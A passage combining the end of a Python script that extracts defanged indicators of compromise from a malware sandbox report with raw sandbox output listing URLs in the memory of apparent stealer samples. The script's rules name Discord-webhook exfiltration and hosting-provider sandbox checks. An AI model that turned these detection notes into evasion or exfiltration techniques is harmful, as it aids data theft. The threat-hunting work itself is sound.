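    user_agents: set = field(default_factory=set)
    tags: set = field(default_factory=set)
    defanged: set = field(default_factory=set)             # host+path, safe to paste in a ticket


def defang(text: str) -> str:
    """Break hosts and URLs so they are not clickable or auto-linked."""
    return text.replace("http", "hxxp").replace(".", "[.]")


def classify(method: str, host: str, path: str, content_length: int, report: IocReport) -> None:
    """Tag a request with the behaviours the report calls out (tag names are this example's)."""
    if host.endswith(("ip-api.com", "ipify.org")):
        report.tags.add("public-ip-lookup")
    # ip-api.com's "hosting" field says whether the caller's public IP belongs to a
    # hosting provider; the report flags this request as a data-centre/sandbox check.
    if host.endswith("ip-api.com") and "fields=hosting" in path:
        report.tags.add("hosting-provider-check")
    if host.endswith("discord.com") and path.startswith("/api/webhooks/"):
        report.tags.add("discord-webhook-exfil")
        report.defanged.add(defang(f"{host}{path}"))
    if method == "POST" and content_length >= LARGE_BODY:
        report.tags.add("large-post-body")


def parse(rows) -> IocReport:
    report = IocReport()
    for row in rows:
        if m := NO_DNS_RE.search(row):      # must run before DNS_RE: it contains the same substring
            report.direct_ips[m.group(1)] += 1
        elif m := DNS_RE.search(row):
            report.domains.add(m.group(1))
        elif m := REQ_RE.search(row):
            method, path = m.groups()
            host_m, ua_m, cl_m = HOST_RE.search(row), UA_RE.search(row), CL_RE.search(row)
            host = host_m.group(1).strip() if host_m else ""
            ua = ua_m.group(1).strip() if ua_m else ""
            content_length = int(cl_m.group(1)) if cl_m else 0
            report.requests.append((method, host, path, ua))
            if ua:
                report.user_agents.add(ua)
            classify(method, host, path, content_length, report)
        # code-function rows, memory strings and HTTP responses are ignored here
    if report.direct_ips:
        report.tags.add("direct-ip-traffic")  # no DNS lookup: hard-coded C2 address candidate
    return report


def block_list(report: IocReport) -> list:
    """Defanged block-list candidates: domains first, then raw IPs."""
    return sorted(defang(d) for d in report.domains) + sorted(defang(ip) for ip in report.direct_ips)


if __name__ == "__main__":
    r = parse(SAMPLE_ROWS)
    print("\n".join(block_list(r)))
    print(sorted(r.tags), dict(r.direct_ips), sorted(r.user_agents))
```

The Host and User-Agent captures are deliberately lazy and stop at the next known header name, which is what makes the run-together sandbox text split correctly; when a report contains other headers, add them to `HEADERS`. Counting occurrences of the direct-IP rows rather than collapsing them keeps the signal that the address was contacted repeatedly, which is worth more to a hunt than the bare IP.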
                        Source: program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digi
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: program.exe, 00000008.00000002.1939870839.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593036472.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936998736.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1749300110.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: powershell.exe, 00000014.00000002.1850687248.000002399BA9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                        Source: program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com/
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com/mail/
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939236456.00000237A4D18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp | String found in binary or memory: http://ip-api.com/json
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: program.exe, 00000008.00000003.1548458152.00000237A47EC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1543639297.00000237A47C5000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hostingr~
                        Source: program.exe, 00000008.00000003.1548458152.00000237A47EC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1543639297.00000237A47C5000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
                        Source: powershell.exe, 00000014.00000002.1825728289.0000023993632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F88196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F8901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 
http://ocsp.digicert.com0A
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                        Source: powershell.exe, 00000014.00000002.1689641102.00000239837E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: eternal.exe, 00000002.00000002.3208274696.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1689641102.00000239835C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
